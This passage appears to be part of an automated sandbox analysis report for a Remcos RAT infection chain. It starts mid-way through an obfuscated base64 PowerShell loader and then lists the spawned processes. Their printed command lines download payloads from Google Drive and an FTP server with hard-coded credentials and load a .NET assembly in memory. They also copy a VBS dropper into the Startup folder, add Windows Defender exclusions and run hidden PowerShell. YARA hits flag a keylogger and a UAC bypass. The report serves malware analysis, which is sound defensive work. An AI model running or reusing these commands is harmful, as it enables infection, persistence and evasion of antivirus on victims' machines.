'GE' + [char]65 + 'd' + [char]65 + 'BT' + [char]65 + 'Fw' + [char]65 + 'cwB3' + [char]65 + 'G8' + [char]65 + 'Z' + [char]65 + 'Bu' + [char]65 + 'Gk' + [char]65 + 'VwBc' + [char]65 + 'HQ' + [char]65 + 'ZgBv' + [char]65 + 'HM' + [char]65 + 'bwBy' + [char]65 + 'GM' + [char]65 + 'aQBN' + [char]65 + 'Fw' + [char]65 + 'ZwBu' + [char]65 + 'Gk' + [char]65 + 'bQBh' + [char]65 + 'G8' + [char]65 + 'UgBc' + [char]65 + 'GE' + [char]65 + 'd' + [char]65 + 'Bh' + [char]65 + 'EQ' + [char]65 + 'c' + [char]65 + 'Bw' + [char]65 + 
'EE' + [char]65 + 'X' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'Kw' + [char]65 + 'g' + [char]65 + 'Fo' + [char]65 + 'SwBu' + [char]65 + 'Fk' + [char]65 + 'TQ' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'G4' + [char]65 + 'bwBp' + [char]65 + 'HQ' + [char]65 + 'YQBu' + [char]65 + 'Gk' + [char]65 + 'd' + [char]65 + 'Bz' + [char]65 + 'GU' + [char]65 + 'R' + [char]65 + '' + [char]65 + 't' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'Jw' + [char]65 + 'l' + [char]65 + 'Ek' + [char]65 + 'a' + [char]65 + 'Bx' + [char]65 + 'FI' + [char]65 + 'W' + [char]65 + '' + [char]65 + 'l' + [char]65 + 'Cc' + [char]65 + 'I' + [char]65 + 'Bt' + [char]65 + 'GU' + [char]65 + 'd' + [char]65 + 'BJ' + [char]65 + 'C0' + [char]65 + 'eQBw' + [char]65 + 'G8' + [char]65 + 'Qw' + [char]65 + 'g' + [char]65 + 'Ds' + [char]65 + 'I' + [char]65 + 'B0' + [char]65 + 'HI' + [char]65 + 'YQB0' + [char]65 + 'HM' + [char]65 + 'ZQBy' + [char]65 + 'G8' + [char]65 + 'bg' + [char]65 + 'v' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'd' + [char]65 + 'Bl' + [char]65 + 'Gk' + [char]65 + 'dQBx' + [char]65 + 'C8' + [char]65 + 'I' + [char]65 + 'BH' + [char]65 + 'GM' + [char]65 + 'VwBp' + [char]65 + 'FI' + [char]65 + 'I' + [char]65 + 'Bl' + [char]65 + 'Hg' + [char]65 + 'ZQ' + [char]65 + 'u' + [char]65 + 'GE' + [char]65 + 'cwB1' + [char]65 + 'Hc' + [char]65 + 'I' + [char]65 + 'Bl' + [char]65 + 'Hg' + [char]65 + 'ZQ' + [char]65 + 'u' + [char]65 + 'Gw' + [char]65 + 'b' + [char]65 + 'Bl' + [char]65 + 'Gg' + [char]65 + 'cwBy' + [char]65 + 'GU' + [char]65 + 'dwBv' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'I' + [char]65 + '' + [char]65 + '7' + [char]65 + 'Ck' + [char]65 + 'JwB1' + [char]65 + 'HM' + [char]65 + 'bQ' + [char]65 + 'u' + [char]65 + 'G4' + [char]65 + 'aQB3' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'VQBc' + [char]65 + 'Cc' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'r' + [char]65 + 'C' + [char]65 
+ '' + [char]65 + 'V' + [char]65 + 'By' + [char]65 + 'Eg' + [char]65 + 'VgB1' + [char]65 + 'CQ' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'BH' + [char]65 + 'GM' + [char]65 + 'VwBp' + [char]65 + 'FI' + [char]65 + 'Ow' + [char]65 + 'p' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'ZQBt' + [char]65 + 'GE' + [char]65 + 'TgBy' + [char]65 + 'GU' + [char]65 + 'cwBV' + [char]65 + 'Do' + [char]65 + 'OgBd' + [char]65 + 'HQ' + [char]65 + 'bgBl' + [char]65 + 'G0' + [char]65 + 'bgBv' + [char]65 + 'HI' + [char]65 + 'aQB2' + [char]65 + 'G4' + [char]65 + 'RQBb' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'Kw' + [char]65 + 'g' + [char]65 + 'Cc' + [char]65 + 'X' + [char]65 + 'Bz' + [char]65 + 'HI' + [char]65 + 'ZQBz' + [char]65 + 'FU' + [char]65 + 'X' + [char]65 + '' + [char]65 + '6' + [char]65 + 'EM' + [char]65 + 'Jw' + [char]65 + 'o' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'Fo' + [char]65 + 'SwBu' + [char]65 + 'Fk' + [char]65 + 'TQ' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'n' + [char]65 + 'HU' + [char]65 + 'cwBt' + [char]65 + 'C4' + [char]65 + 'bgBp' + [char]65 + 'Hc' + [char]65 + 'c' + [char]65 + 'BV' + [char]65 + 'Fw' + [char]65 + 'Jw' + [char]65 + 'g' + [char]65 + 'Cs' + [char]65 + 'I' + [char]65 + 'BU' + [char]65 + 'HI' + [char]65 + 'S' + [char]65 + 'BW' + [char]65 + 'HU' + [char]65 + 'J' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'QgBL' + [char]65 + 'Ew' + [char]65 + 'UgBV' + [char]65 + 'CQ' + [char]65 + 'K' + [char]65 + 'Bl' + [char]65 + 'Gw' + [char]65 + 'aQBG' + [char]65 + 'GQ' + [char]65 + 'YQBv' + [char]65 + 'Gw' + [char]65 + 'bgB3' + [char]65 + 'G8' + [char]65 + 'R' + [char]65 + '' + [char]65 + 'u' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'c' + [char]65 + 'Bl' + [char]65 + 'GY' + [char]65 + 'eQ' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'O' + [char]65 + 'BG' + [char]65 + 'FQ' + [char]65 + 'VQ' + [char]65 + '6' + 
[char]65 + 'Do' + [char]65 + 'XQBn' + [char]65 + 'G4' + [char]65 + 'aQBk' + [char]65 + 'G8' + [char]65 + 'YwBu' + [char]65 + 'EU' + [char]65 + 'LgB0' + [char]65 + 'Hg' + [char]65 + 'ZQBU' + [char]65 + 'C4' + [char]65 + 'bQBl' + [char]65 + 'HQ' + [char]65 + 'cwB5' + [char]65 + 'FM' + [char]65 + 'Ww' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'Bn' + [char]65 + 'G4' + [char]65 + 'aQBk' + [char]65 + 'G8' + [char]65 + 'YwBu' + [char]65 + 'EU' + [char]65 + 'LgBw' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'ZQBm' + [char]65 + 'Hk' + [char]65 + 'J' + [char]65 + '' + [char]65 + '7' + [char]65 + 'Ck' + [char]65 + 'd' + [char]65 + 'Bu' + [char]65 + 'GU' + [char]65 + 'aQBs' + [char]65 + 'EM' + [char]65 + 'YgBl' + [char]65 + 'Fc' + [char]65 + 'LgB0' + [char]65 + 'GU' + [char]65 + 'Tg' + [char]65 + 'g' + [char]65 + 'HQ' + [char]65 + 'YwBl' + [char]65 + 'Go' + [char]65 + 'YgBP' + [char]65 + 'C0' + [char]65 + 'dwBl' + [char]65 + 'E4' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'Bw' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'ZQBm' + [char]65 + 'Hk' + [char]65 + 'J' + [char]65 + '' + [char]65 + '7' + [char]65 + 'H0' + [char]65 + 'Ow' + [char]65 + 'g' + [char]65 + 'Ck' + [char]65 + 'JwB0' + [char]65 + 'E8' + [char]65 + 'T' + [char]65 + 'Bj' + [char]65 + 'F8' + [char]65 + 'SwBh' + [char]65 + 'DM' + [char]65 + 'WgBm' + [char]65 + 'G8' + [char]65 + 'W' + [char]65 + '' + [char]65 + 'y' + [char]65 + 'Eo' + [char]65 + 'SgBy' + [char]65 + 'FY' + [char]65 + 'a' + [char]65 + 'Bt' + [char]65 + 'FY' + [char]65 + 'OQBj' + [char]65 + 'G0' + [char]65 + 'OQBY' + [char]65 + 'HM' + [char]65 + 'dQBY' + [char]65 + 'G0' + [char]65 + 'ag' + [char]65 + 'x' + [char]65 + 'Gc' + [char]65 + 'MQ' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'Kw' + [char]65 + 'g' + [char]65 + 'Ek' + [char]65 + 'bwBx' + [char]65 + 'GE' + [char]65 + 'Rg' + [char]65 + 'k' + [char]65 + 'Cg' + [char]65 + 'I' + [char]65 + '' + 
[char]65 + '9' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'SQBv' + [char]65 + 'HE' + [char]65 + 'YQBG' + [char]65 + 'CQ' + [char]65 + 'ew' + [char]65 + 'g' + [char]65 + 'GU' + [char]65 + 'cwBs' + [char]65 + 'GU' + [char]65 + 'fQ' + [char]65 + '7' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'KQ' + [char]65 + 'n' + [char]65 + 'DI' + [char]65 + 'N' + [char]65 + 'B1' + [char]65 + 'Fg' + [char]65 + 'SgBU' + [char]65 + 'HE' + [char]65 + 'YQBt' + [char]65 + 'Gc' + [char]65 + 'eQBN' + [char]65 + 'HQ' + [char]65 + 'RgB6' + [char]65 + 'GE' + [char]65 + 'awBQ' + [char]65 + 'FI' + [char]65 + 'MQBx' + [char]65 + 'F8' + [char]65 + 'SQB2' + [char]65 + 'Ec' + [char]65 + 'aQBY' + [char]65 + 'E4' + [char]65 + 'Z' + [char]65 + 'Bx' + [char]65 + 'GE' + [char]65 + 'Tg' + [char]65 + 'x' + [char]65 + 'Cc' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'r' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'SQBv' + [char]65 + 'HE' + [char]65 + 'YQBG' + [char]65 + 'CQ' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'BJ' + [char]65 + 'G8' + [char]65 + 'cQBh' + [char]65 + 'EY' + [char]65 + 'J' + [char]65 + 'B7' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 + 'HI' + [char]65 + 'bQBF' + [char]65 + 'Hc' + [char]65 + 'ag' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'GY' + [char]65 + 'aQ' + [char]65 + '7' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'KQ' + [char]65 + 'n' + [char]65 + 'DQ' + [char]65 + 'Ng' + [char]65 + 'n' + [char]65 + 'Cg' + [char]65 + 'cwBu' + [char]65 + 'Gk' + [char]65 + 'YQB0' + [char]65 + 'G4' + [char]65 + 'bwBD' + [char]65 + 'C4' + [char]65 + 'RQBS' + [char]65 + 'FU' + [char]65 + 'V' + [char]65 + 'BD' + [char]65 + 'EU' + [char]65 + 'V' + [char]65 + 'BJ' + [char]65 + 'Eg' + [char]65 + 'QwBS' + [char]65 + 'EE' + [char]65 + 'XwBS' + [char]65 + 'E8' + [char]65 + 'UwBT' + [char]65 + 'EU' + [char]65 + 'QwBP' + [char]65 + 'FI' + 
[char]65 + 'U' + [char]65 + '' + [char]65 + '6' + [char]65 + 'HY' + [char]65 + 'bgBl' + [char]65 + 'CQ' + [char]65 + 'I' + [char]65 + '' + [char]65 + '9' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'cgBt' + [char]65 + 'EU' + [char]65 + 'dwBq' + [char]65 + 'CQ' + [char]65 + 'Ow' + [char]65 + 'n' + [char]65 + 'D0' + [char]65 + 'Z' + [char]65 + 'Bp' + [char]65 + 'CY' + [char]65 + 'Z' + [char]65 + 'Bh' + [char]65 + 'G8' + [char]65 + 'b' + [char]65 + 'Bu' + [char]65 + 'Hc' + [char]65 + 'bwBk' + [char]65 + 'D0' + [char]65 + 'd' + [char]65 + 'By' + [char]65 + 'G8' + [char]65 + 'c' + [char]65 + 'B4' + [char]65 + 'GU' + [char]65 + 'PwBj' + [char]65 + 'HU' + [char]65 + 'LwBt' + [char]65 + 'G8' + [char]65 + 'Yw' + [char]65 + 'u' + [char]65 + 'GU' + [char]65 + 'b' + [char]65 + 'Bn' + [char]65 + 'G8' + [char]65 + 'bwBn' + [char]65 + 'C4' + [char]65 + 'ZQB2' + [char]65 + 'Gk' + [char]65 + 'cgBk' + [char]65 + 'C8' + [char]65 + 'Lw' + [char]65 + '6' + [char]65 + 'HM' + [char]65 + 'c' + [char]65 + 'B0' + [char]65 + 'HQ' + [char]65 + 'a' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'Ek' + [char]65 + 'bwBx' + [char]65 + 'GE' + [char]65 + 'Rg' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 + 'Cc' + [char]65 + 'dQBz' + [char]65 + 'G0' + [char]65 + 'LgBu' + [char]65 + 'Gk' + [char]65 + 'dwBw' + [char]65 + 'FU' + [char]65 + 'X' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'Kw' + [char]65 + 'g' + [char]65 + 'FQ' + [char]65 + 'cgBI' + [char]65 + 'FY' + [char]65 + 'dQ' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'Gw' + [char]65 + 'ZQBk' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'o' + [char]65 + 'Gg' + [char]65 + 'd' + [char]65 + 'Bh' + [char]65 + 'F' + [char]65 + '' + [char]65 + 'c' + [char]65 + 'Bt' + [char]65 + 'GU' + [char]65 + 'V' + [char]65 + 'B0' + [char]65 + 'GU' + 
[char]65 + 'Rw' + [char]65 + '6' + [char]65 + 'Do' + [char]65 + 'XQBo' + [char]65 + 'HQ' + [char]65 + 'YQBQ' + [char]65 + 'C4' + [char]65 + 'TwBJ' + [char]65 + 'C4' + [char]65 + 'bQBl' + [char]65 + 'HQ' + [char]65 + 'cwB5' + [char]65 + 'FM' + [char]65 + 'Ww' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'BU' + [char]65 + 'HI' + [char]65 + 'S' + [char]65 + 'BW' + [char]65 + 'HU' + [char]65 + 'J' + [char]65 + 'B7' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 + 'Ew' + [char]65 + 'QQBy' + [char]65 + 'Hc' + [char]65 + 'Sg' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'GY' + [char]65 + 'aQ' + [char]65 + '7' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'KQ' + [char]65 + 'y' + [char]65 + 'Cg' + [char]65 + 'cwBs' + [char]65 + 'GE' + [char]65 + 'dQBx' + [char]65 + 'EU' + [char]65 + 'LgBy' + [char]65 + 'G8' + [char]65 + 'agBh' + [char]65 + 'E0' + [char]65 + 'LgBu' + [char]65 + 'G8' + [char]65 + 'aQBz' + [char]65 + 'HI' + [char]65 + 'ZQBW' + [char]65 + 'C4' + [char]65 + 'd' + [char]65 + 'Bz' + [char]65 + 'G8' + [char]65 + 'a' + [char]65 + '' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'Ew' + [char]65 + 'QQBy' + [char]65 + 'Hc' + [char]65 + 'Sg' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'Ow' + [char]65 + '=';$nvcbv = $qKKzc.replace('???' , 'A') ;$acwwn = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $nvcbv ) ); $acwwn = $acwwn[-1..-$acwwn.Length] -join '';$acwwn = $acwwn.replace('%XRqhI%','C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs');powershell $acwwn
                                Imagebase:0x7ff6e3d50000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:3
                                Start time:03:28:03
                                Start date:03/10/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff66e660000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:4
                                Start time:03:28:06
                                Start date:03/10/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $JwrAL = $host.Version.Major.Equals(2) ;if ( $JwrAL ) {$uVHrT = [System.IO.Path]::GetTempPath();del ( $uVHrT + '\Upwin.msu' );$FaqoI = 'https://drive.google.com/uc?export=download&id=';$jwEmr = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $jwEmr ) {$FaqoI = ($FaqoI + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$FaqoI = ($FaqoI + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yfepp = (New-Object Net.WebClient);$yfepp.Encoding = [System.Text.Encoding]::UTF8;$yfepp.DownloadFile($URLKB, $uVHrT + '\Upwin.msu');$MYnKZ = ('C:\Users\' + [Environment]::UserName );RiWcG = ($uVHrT + '\Upwin.msu'); powershell.exe wusa.exe RiWcG /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs' -Destination ( $MYnKZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$mjdqf.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),'developerpro21578Jp@@');$lBCzSg = $mjdqf.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mjdqf.dispose();$mjdqf = (New-Object Net.WebClient);$mjdqf.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mjdqf.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' 
, 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.db/ssc/ezimotsuc/sedulcni-pw/moc.srekeesedutitarg.www//:sptth' , $huUPX , 'D DD' ) );};"
                                Imagebase:0x7ff6e3d50000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:5
                                Start time:03:28:12
                                Start date:03/10/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ;
                                Imagebase:0x7ff6e3d50000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:6
                                Start time:03:28:12
                                Start date:03/10/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ;
                                Imagebase:0x7ff6e3d50000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000006.00000002.2273102577.000001C100222000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:high
                                Has exited:true

                                Target ID:7
                                Start time:03:28:12
                                Start date:03/10/2024
                                Path:C:\Windows\System32\cmd.exe
                                Wow64 process (32bit):false
                                Commandline:cmd.exe /c mkdir "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\"
                                Imagebase:0x7ff67dc30000
                                File size:289'792 bytes
                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:8
                                Start time:03:28:13
                                Start date:03/10/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\\x2.ps1"
                                Imagebase:0x7ff6e3d50000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:9
                                Start time:03:28:16
                                Start date:03/10/2024
                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                Imagebase:0x7ff717f30000
                                File size:496'640 bytes
                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                Has elevated privileges:true
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:13
                                Start time:03:28:21
                                Start date:03/10/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1"
                                Imagebase:0x7ff6e3d50000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000D.00000002.2594598048.000001EB5D6E8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.2594598048.000001EB5D6E8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000002.2594598048.000001EB5D6E8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000D.00000002.2594598048.000001EB5D6E8000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000D.00000002.2594598048.000001EB5D360000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000D.00000002.2594598048.000001EB5D360000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000D.00000002.2594598048.000001EB5D360000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000D.00000002.2594598048.000001EB5D360000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                Reputation:high
                                Has exited:true

                                Target ID:14
                                Start time:03:28:21
                                Start date:03/10/2024
                                Path:C:\Windows\System32\cmd.exe
                                Wow64 process (32bit):false
                                Commandline:cmd.exe /c del "C:\Users\user\Desktop\SKMBT_77122012816310TD0128_17311_XLS.vbs"
                                Imagebase:0x7ff67dc30000
                                File size:289'792 bytes
                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:15
                                Start time:03:28:23
                                Start date:03/10/2024
                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Imagebase:0xbc0000
                                File size:65'440 bytes
                                MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.3436475205.00000000011AB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                Has exited:false

                                Target ID:16
                                Start time:03:28:24
                                Start date:03/10/2024
                                Path:C:\Windows\System32\cmd.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' ";exit
                                Imagebase:0x7ff67dc30000
                                File size:289'792 bytes
                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:17
                                Start time:03:28:24
                                Start date:03/10/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff66e660000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:18
                                Start time:03:28:24
                                Start date:03/10/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' ";exit
                                Imagebase:0x7ff6e3d50000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000012.00000002.2661640004.0000019971901000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000012.00000002.2661640004.0000019971901000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000012.00000002.2661640004.0000019971901000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000012.00000002.2661640004.0000019971901000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                Has exited:true

                                Target ID:19
                                Start time:03:28:24
                                Start date:03/10/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff66e660000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:20
                                Start time:03:28:27
                                Start date:03/10/2024
                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Imagebase:0x8d0000
                                File size:65'440 bytes
                                MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
